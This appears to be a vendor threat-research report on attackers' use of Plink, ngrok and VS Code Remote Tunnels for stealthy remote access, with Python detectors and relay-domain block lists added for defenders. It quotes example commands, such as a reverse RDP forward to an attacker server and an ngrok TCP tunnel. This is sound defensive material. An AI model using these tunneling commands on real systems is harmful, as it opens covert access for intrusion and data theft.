Key Points 

  • Protocol tunneling is a technique attackers often use to bypass network defenses, encapsulating malicious traffic within commonly allowed protocols like HTTP, DNS, and SSH.
  • Protocol tunneling is an attractive technique for command-and-control (C2) because it can blend in with legitimate traffic and cloud services for stealthy persistent access and exfiltration.
  • Tools like Plink for SSH tunneling, ngrok for HTTP/HTTPS and TCP tunneling, and Visual Studio Code (VS Code) Remote Tunnels for remote development tunneling let threat actors blend in with legitimate administrator activity.
  • To prevent abuse, we recommend blocking the relay domains used by tools like ngrok and VS Code Remote Tunnels, enforcing application control (Software Restriction Policies or a current equivalent such as AppLocker), and setting endpoint detection and response (EDR) tools to block mode.

Protocol tunneling is a technique used to encapsulate one network protocol within another, allowing data to be transmitted through a secure or otherwise-allowed protocol. There are many legitimate use cases for protocol tunneling in enterprise environments. Tunneling protocols provide encryption and secure channels for data transmission, protecting sensitive information from unauthorized access. They also allow users to easily access remote resources and services to test, manage, and troubleshoot applications and systems.

On the other hand, threat actors often use this method to bypass network defenses and maintain covert command-and-control (C2) channels after compromising hosts within an environment. By encapsulating malicious traffic within commonly permitted protocols such as HTTP, Domain Name System (DNS), or SSH, attackers can evade firewalls, intrusion detection systems (IDS), and other security controls that might otherwise detect and block their activity. If these channels are not found and closed during remediation, the threat actor is never actually evicted from the environment and can simply resume the attack.

The primary motivations for using protocol tunneling include evading security controls, blending malicious traffic with legitimate network traffic to avoid detection, maintaining persistent access to compromised systems, and enabling the covert exfiltration of sensitive data. The technique is often accomplished using legitimate tools designed for secure remote access and development purposes that are repurposed for malicious activities. Tools such as Plink and ngrok offer a simple way to establish tunnels; we have observed cybercriminals use these tools for intrusion in multiple ransomware and extortion attacks over the past few years. Additionally, ReliaQuest recently investigated a customer incident involving the use of a newer tunneling feature in Visual Studio Code (VS Code), a source code editor from Microsoft. This report—the first in a series on protocol tunneling—outlines why threat actors use protocol tunneling, explores common tools used to tunnel network traffic, and provides actionable recommendations to prevent the malicious use of these tools. Subsequent reports in this series will delve deeper into hunting for the presence of specific tools within networks.

Malicious Use of Protocol Tunneling

Below are some of the ways and reasons that threat actors leverage tunneling protocols to bypass security controls and monitoring systems.

Bypassing Network Controls

  • Evading security policies: Firewalls and network filters often block specific protocols or ports associated with malicious activity. Tunneling traffic through allowed protocols (such as HTTP, DNS, and SSH) can bypass these restrictions.
  • Circumventing content inspection: Some security devices perform deep packet inspection (DPI) to identify and block malicious content. Tunneling techniques using encryption can obfuscate payloads, making it harder for DPI systems to detect and analyze the traffic.

Maintaining Stealth

  • Blending with legitimate traffic: By encapsulating malicious traffic within commonly used protocols (e.g., HTTPS), attackers can disguise their communication as legitimate traffic, reducing the likelihood of detection.
  • Using public cloud services: Attackers can route their traffic through legitimate public cloud services such as ngrok's edge network and Microsoft's dev tunnels service. Traffic to these services is common in many networks and is often treated as benign.

Persistent Access

  • Establishing reliable communication: Tunneling ensures that attackers can maintain a reliable communication channel with compromised systems, even if network configurations change or additional security measures are implemented.
  • Evading network segmentation: In segmented networks, direct communication between different network segments may be restricted. Tunneling can bridge these segments, allowing attackers to move laterally within the network.

Data Exfiltration

  • Concealing data theft: Attackers can use tunnels to exfiltrate sensitive data covertly. Encapsulating data within legitimate protocols makes it difficult for security systems to identify and block the exfiltration.
  • Avoiding detection: Traditional network monitoring tools might not inspect the contents of tunneled traffic, allowing attackers to exfiltrate data without raising alarms.

Common Tunneling Tools

Adding to the stealthy nature of this technique, tunneling can often be accomplished with tools designed for legitimate purposes such as secure remote access or code development and testing. While some threat actors use custom malware to tunnel traffic, others choose legitimate tools that camouflage their traffic as administrator activity, preventing detection. Below, we provide an overview of three commonly used tunneling tools: Plink, ngrok, and VS Code Remote Tunnels.

Plink

Plink (PuTTY Link), a command-line interface (CLI) to the PuTTY back ends, is a versatile tool designed for legitimate purposes such as scripted secure remote access. Attackers can exploit its capabilities to establish covert communication channels and maintain control over compromised systems. By using Plink, threat actors can encapsulate other types of traffic within encrypted SSH tunnels, helping them bypass security controls.

How Threat Actors Use Plink

SSH tunnels using Plink are typically established using port forwarding, which is a technique used to redirect network traffic from one port to another, enabling secure communication between different network segments. Attackers exploit this functionality by using Plink to establish both local and remote port forwarding.

Local and remote port forwarding both redirect traffic through the encrypted SSH tunnel, but in opposite directions. Local port forwarding (Plink's -L option) opens a listening port on the SSH client and forwards any connection to it through the tunnel to a destination reachable from the SSH server. When the attacker runs the client against an SSH server inside the target network, this provides access to services on that server or on other hosts in the same network segment.

Remote port forwarding (-R) does the reverse: it opens a listening port on the SSH server and forwards connections to it back through the tunnel to a destination reachable from the client. This is the method we most often see, because Plink runs on the compromised host as the SSH client and connects outbound to an attacker-controlled SSH server, which exposes an internal service on that server. For example, plink -R 3389:127.0.0.1:3389 <attacker-server> makes port 3389 on the attacker's server forward to the RDP service on the compromised host. This allows the attacker to RDP to an internal host behind a firewall that does not allow inbound RDP.

We have seen more than 200 mentions on dark web platforms of using Plink for port forwarding and to tunnel protocols like RDP. In one such post, for example, a forum user provided a tutorial on how to use “the Netcat shell and plink.exe” to “set up remote port forwarding from the victim’s system to my machine” to access remote desktop for a host behind a firewall in an internal network (quotations translated from Russian). They shared detailed steps and example commands to set up port forwarding to access the RDP service.
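To make the local/remote distinction concrete for a detection engineer, the following is an added example (not code from ReliaQuest or the PuTTY project) in Python. It parses Plink's -L, -R and -D forwarding flags out of process-creation command lines, as an EDR or Sysmon event would record them, and reports what each forward exposes. The command lines, the list of value-taking options and the service-port table are constructed for the example; IPv6 listen addresses and Plink's session-file syntax are not handled.

```python
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Ports whose remote exposure most often means a threat actor is opening an
# inbound path to a compromised host (constructed list; extend as needed).
EXPOSED_SERVICE_PORTS = {3389: "RDP", 5900: "VNC", 445: "SMB", 5985: "WinRM", 22: "SSH"}

# Plink options that consume the following token, so a value such as "-pw -R"
# is not mistaken for a forwarding flag (subset of Plink's option list).
OPTIONS_WITH_VALUE = {"-P", "-l", "-pw", "-pwfile", "-i", "-m", "-load", "-proxycmd", "-hostkey"}


@dataclass
class Forward:
    kind: str                 # "local" (-L), "remote" (-R) or "dynamic" (-D)
    listen_addr: str          # bind address on the listening side; "" = loopback default
    listen_port: int
    dest_host: Optional[str]  # None for a dynamic (SOCKS) forward
    dest_port: Optional[int]


def parse_forward_spec(flag: str, spec: str) -> Forward:
    """Parse one Plink spec of the form [listen-addr:]listen-port[:dest-host:dest-port]."""
    kind = {"-L": "local", "-R": "remote", "-D": "dynamic"}[flag]
    parts = spec.split(":")
    if kind == "dynamic":
        if len(parts) not in (1, 2):
            raise ValueError(f"bad -D spec: {spec}")
        listen_addr = parts[0] if len(parts) == 2 else ""
        return Forward(kind, listen_addr, int(parts[-1]), None, None)
    if len(parts) == 3:
        listen_addr, listen_port, dest_host, dest_port = "", *parts
    elif len(parts) == 4:
        listen_addr, listen_port, dest_host, dest_port = parts
    else:
        raise ValueError(f"bad {flag} spec: {spec}")
    return Forward(kind, listen_addr, int(listen_port), dest_host, int(dest_port))


def parse_plink_cmdline(cmdline: str) -> List[Forward]:
    """Extract every -L/-R/-D forward from a Windows process command line."""
    # posix=False keeps backslashes in Windows paths intact; quotes are stripped afterwards.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    forwards: List[Forward] = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("-L", "-R", "-D") and i + 1 < len(tokens):
            forwards.append(parse_forward_spec(tok, tokens[i + 1]))   # detached form: -R spec
            i += 2
            continue
        if tok[:2] in ("-L", "-R", "-D") and len(tok) > 2:
            forwards.append(parse_forward_spec(tok[:2], tok[2:]))     # attached form: -Rspec
        elif tok in OPTIONS_WITH_VALUE:
            i += 1                                                    # skip the option's value
        i += 1
    return forwards


def triage(cmdline: str) -> List[str]:
    """One finding per forward, phrased from the viewpoint of the host running Plink."""
    findings = []
    for fwd in parse_plink_cmdline(cmdline):
        if fwd.kind == "remote":
            service = EXPOSED_SERVICE_PORTS.get(fwd.dest_port, f"tcp/{fwd.dest_port}")
            findings.append(f"REMOTE forward: SSH server port {fwd.listen_port} -> "
                            f"{fwd.dest_host}:{fwd.dest_port} on this host (exposes {service} inbound)")
        elif fwd.kind == "local":
            findings.append(f"local forward: this host port {fwd.listen_port} -> "
                            f"{fwd.dest_host}:{fwd.dest_port} via the SSH server")
        else:
            findings.append(f"dynamic SOCKS proxy on this host port {fwd.listen_port}")
    return findings


# Constructed process-creation command lines (not from a real incident).
SAMPLE_CMDLINES = [
    r'"C:\Users\Public\plink.exe" -ssh -N -batch -R 3389:127.0.0.1:3389 -l tunnel -pw Passw0rd 203.0.113.10',
    r'plink.exe -ssh -L 8080:10.0.0.5:80 -P 2222 admin@jump.corp.example',
    r'plink.exe -N -D 0.0.0.0:1080 ops@203.0.113.10',
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(cmd)
        for finding in triage(cmd):
            print("   ", finding)
```

The first sample line is the pattern described above: a remote forward whose destination is the host's own loopback RDP port, which is the one to alert on with the highest priority; a local forward or SOCKS proxy from an unexpected host is still worth a look, but it points the other way.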

Mitigations

To perform port forwarding with Plink, the compromised host must establish an outbound SSH connection. Create network policies on protocol-aware firewall devices to block outbound SSH for devices that do not need to reach external systems over SSH; match on the SSH protocol itself rather than on TCP port 22 alone, because Plink's -P option lets the attacker run the SSH server on any port. Additionally, implement Group Policy Objects (GPOs) for Software Restriction Policies (SRP), or a current application control mechanism such as AppLocker or Windows Defender Application Control, in Active Directory (AD) to prevent the execution of Plink enterprise-wide if the tool is not legitimately used. Exceptions should be made for administrators and devices that require it.

ngrok

ngrok is a popular tool designed to create secure tunnels from a public endpoint to a local service, often used by developers to expose local servers to the internet for testing and development purposes. It works by providing a unique, publicly accessible URL that forwards traffic to a specified port on the local machine. While ngrok has many legitimate uses, attackers exploit its capabilities to bypass network controls and establish covert communication channels. The notorious cybercrime group “Scattered Spider” has used ngrok to establish persistent access in many intrusions, including an incident observed by ReliaQuest in November 2023.

How Threat Actors Use ngrok

The ngrok agent makes a single outbound TLS connection on port 443 to ngrok's service, so it passes through firewalls and intrusion detection systems that allow ordinary HTTPS and would otherwise block direct inbound connections. Attackers use ngrok to quickly and easily create temporary, dynamic URLs and endpoints that are difficult to track and block, allowing them to maintain remote control over compromised systems, exfiltrate data, and execute commands without raising alarms.

Similar to SSH tunneling, ngrok can make services on internal machines accessible through a firewall. The difference is that the agent's outbound connection looks like HTTPS, while the endpoint ngrok publishes on the other side can be HTTP, HTTPS, or a raw TCP port (the form used for RDP). Additionally, traffic is relayed through ngrok's global network of servers and accessed via dynamic URLs, removing the need for attackers to administer their own server. This can also make the traffic harder to detect, especially if ngrok is used legitimately in the environment.

We have observed users on dark web forums suggest the use of ngrok to other users who are looking for a way to get remote access to internal services on a compromised host behind a firewall. One user, for instance, was seeking “a socks4 proxy type for connect to a local network with other devices.” The ReliaQuest Threat Research team has identified more than 400 posts on dark web platforms related to using ngrok to tunnel traffic for remote access. Additionally, some remote-access trojans (RAT) like XWorm and Anarchy Panel RAT are advertised as having built-in capabilities to install ngrok, indicating it is a popular tool for facilitating remote access.

While ngrok can be used for various purposes, we most often see it used to reach RDP and gain remote access on compromised hosts. By installing the ngrok agent on a compromised host and pointing a TCP tunnel at RDP port 3389 (ngrok tcp 3389), an attacker obtains a public ngrok endpoint that delivers an RDP session to an internal client on the network. Alternatively, ngrok might be used to tunnel a Virtual Network Computing (VNC) connection; VNC is a graphical desktop-sharing technology that uses the Remote Frame Buffer protocol to provide RDP-like control over another computer. Threat actors may install a VNC server on a compromised host and then use ngrok to make that server reachable, granting them remote access.

Mitigations

ngrok uses a network of servers that relay traffic to the upstream service running on the client. Create network policies in the environment to block traffic to the following domains.

Tool: ngrok
Network relay domains: *.ngrok.com, *.ngrok.io, *.ngrok-free.app, *.ngrok-free.dev, *.ngrok.app, *.ngrok.dev

This list covers the public endpoint domains. Check ngrok's current agent documentation for the hostname the agent itself connects to and block that as well, since blocking only the endpoint domains may leave the agent's control channel open. Additionally, implement GPOs for SRP (or AppLocker/Windows Defender Application Control) in AD to prevent the execution of ngrok. Create exceptions for these network and host controls to allow hosts or users that use the software to serve a legitimate business function.

VS Code Remote Tunnels

VS Code has become a cornerstone of the modern developer's toolkit, valued for its versatility and broad extension library, and many enterprises and consumers rely on its convenience. One of those conveniences is VS Code's tunneling ability, Remote Tunnels. VS Code Remote Tunnels is a feature designed to improve the remote development experience by enabling secure connections to remote machines via Microsoft dev tunnels, integrating local and remote workflows. While primarily aimed at legitimate use cases such as remote debugging, code navigation, and collaborative development, Remote Tunnels can be leveraged by malicious actors to establish covert communication channels and maintain persistent access to compromised systems.

How Threat Actors Use VS Code Remote Tunnels

Using the VS Code CLI (code tunnel), attackers can start a tunnel on a compromised host, authenticating it with a GitHub or Microsoft account they control. Because the VS Code binary is signed and trusted, the activity tends to pass traditional security defenses. The tunnel is an encrypted HTTPS connection outbound to Microsoft's service and effectively provides reverse shell access to the internal host: the attacker connects from a VS Code client or vscode.dev and gets an integrated terminal and file access on the remote machine. With this access, an attacker can execute commands, navigate the file system, and exfiltrate data with minimal detection risk. The legitimate appearance of the VS Code binary lets it evade mechanisms that would normally catch tunnel abuse, such as static detections, antivirus software, or EDR.

Moreover, the tunneled traffic is routed through Microsoft domains such as visualstudio.com (tunnels.api.visualstudio.com) and devtunnels.ms, blending seamlessly with legitimate traffic and complicating detection. Attackers can exploit this feature to establish a reverse shell, granting them extensive control over the target system without raising immediate alarms. While VS Code Remote Tunnels is currently not as prevalent as Plink and ngrok, and we have not yet seen its use discussed on criminal forums, ReliaQuest has observed malicious VS Code tunneling for remote shell access in a recent incident. Given the trusted nature of the software, use of this technique is likely to increase.

Mitigations

Similar to ngrok, VS Code Remote Tunnels uses cloud-hosted servers to relay traffic to the client machine. Create network policies in the environment to block traffic to the following domains.

Tool: VS Code Dev Tunnels
Network relay domains: *.tunnels.api.visualstudio.com, *.devtunnels.ms

Additionally, GPOs can be configured to control access to Dev Tunnels, including disabling the service entirely. Refer to Microsoft's documentation to create policies that disable Dev Tunnels on Windows hosts in the environment. Create exceptions for these network and host controls to allow hosts or users that use the feature for a legitimate business function.
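The two relay-domain lists above (for ngrok and for VS Code Dev Tunnels) are wildcard patterns, and a common mistake when turning them into a detection is a plain substring match, which fires on names like notngrok.com and misses nothing, or a naive suffix match, which misses the trailing-dot form DNS logs often carry. The following added example (not code from ReliaQuest, ngrok or Microsoft) in Python matches both lists on label boundaries and runs them over a DNS query log; the log lines, their format, and the query names are constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Relay domains from the two tables in this report, keyed by tool.
RELAY_DOMAINS: Dict[str, List[str]] = {
    "ngrok": ["*.ngrok.com", "*.ngrok.io", "*.ngrok-free.app", "*.ngrok-free.dev",
              "*.ngrok.app", "*.ngrok.dev"],
    "VS Code Dev Tunnels": ["*.tunnels.api.visualstudio.com", "*.devtunnels.ms"],
}


def normalize(name: str) -> str:
    """Lower-case and drop the trailing dot that DNS logs often carry ('x.ngrok.io.')."""
    return name.strip().rstrip(".").lower()


def matches(pattern: str, name: str) -> bool:
    """Wildcard match on label boundaries. '*.ngrok.com' is treated as ngrok.com plus any
    depth of subdomain; it does not match 'notngrok.com' or 'ngrok.com.evil.example'."""
    pattern, name = normalize(pattern), normalize(name)
    if pattern.startswith("*."):
        base = pattern[2:]
        return name == base or name.endswith("." + base)
    return name == pattern


def classify(name: str) -> Optional[str]:
    """Return the tool whose relay list covers this name, or None."""
    for tool, patterns in RELAY_DOMAINS.items():
        if any(matches(p, name) for p in patterns):
            return tool
    return None


# Constructed DNS query log (not customer data): timestamp, client IP, record type, query name.
SAMPLE_DNS_LOG = """\
2024-06-12T14:02:11Z 10.20.30.40 A 1a2b-203-0-113-10.ngrok-free.app.
2024-06-12T14:02:15Z 10.20.30.41 A login.microsoftonline.com
2024-06-12T14:03:02Z 10.20.30.40 A euw.rel.tunnels.api.visualstudio.com
2024-06-12T14:03:40Z 10.20.30.42 A ngrok.com.cdn.example
2024-06-12T14:04:01Z 10.20.30.43 A NOTngrok.com
2024-06-12T14:04:30Z 10.20.30.44 A abc123-8080.euw.devtunnels.ms
"""

LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def scan_dns_log(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, query_name, tool) for every query that hits a relay domain."""
    hits: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue                      # skip blank or malformed lines
        _ts, client, _rtype, qname = m.groups()
        tool = classify(qname)
        if tool:
            hits.append((client, normalize(qname), tool))
    return hits


if __name__ == "__main__":
    for client, qname, tool in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{client} queried {qname} ({tool} relay)")
```

The same matches function can drive the allow-list exceptions mentioned above: keep a per-tool set of client IPs or hostnames that legitimately use the software and suppress hits from those sources rather than weakening the patterns themselves.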

Threat Forecast

Protocol tunneling has proven to be an effective technique for threat actors to obtain remote access to internal network clients. We predict, with high confidence, that the use of protocol tunneling tools will not decrease in the long term. Tools like ngrok and Plink have been used by threat actors for years and offer an easily deployable means to evade detection and establish persistent access to compromised systems. The growing adoption of encrypted traffic and the ubiquitous use of cloud services also provide fertile ground for these tools to operate undetected. Additionally, the relatively new tunnel feature in VS Code offers an arguably even stealthier way to establish remote access. Because the software benefits from the trusted nature of Microsoft products, its abuse is likely to become more popular among threat actors.

What ReliaQuest Is Doing

To identify suspicious tunneling, ReliaQuest offers detection rules that alert defenders to activity related to protocol tunneling. To remediate suspicious activity, associated GreyMatter Respond Plays can be executed by ReliaQuest customers or by the ReliaQuest team on a customer's behalf.

Recommendations and Best Practices

The ReliaQuest Threat Research team offers the following non-exhaustive list of recommendations and best practices to establish a secure foundation against the threats and tactics, techniques, and procedures (TTPs) mentioned in this report.

  • Block network relays for tunneling tools: Configure firewalls and forward proxies to block the network relay domains for ngrok and VS Code Remote Tunnels. Configure protocol-aware policies to block outbound SSH from network segments that do not need to make external SSH connections.
  • Block unwanted tools via application control: Use SRPs in Active Directory to prevent specific applications from executing. Dedicated application control technologies (such as AppLocker or Windows Defender Application Control) can also perform this function and are the supported successors to SRP.
  • Set EDR to prevent mode: Run EDR tools in prevent/block mode instead of detect-only mode. Tunneling tools are typically introduced after a system has been compromised by malware, so EDR in block mode can stop the common malware that gives attackers their initial access.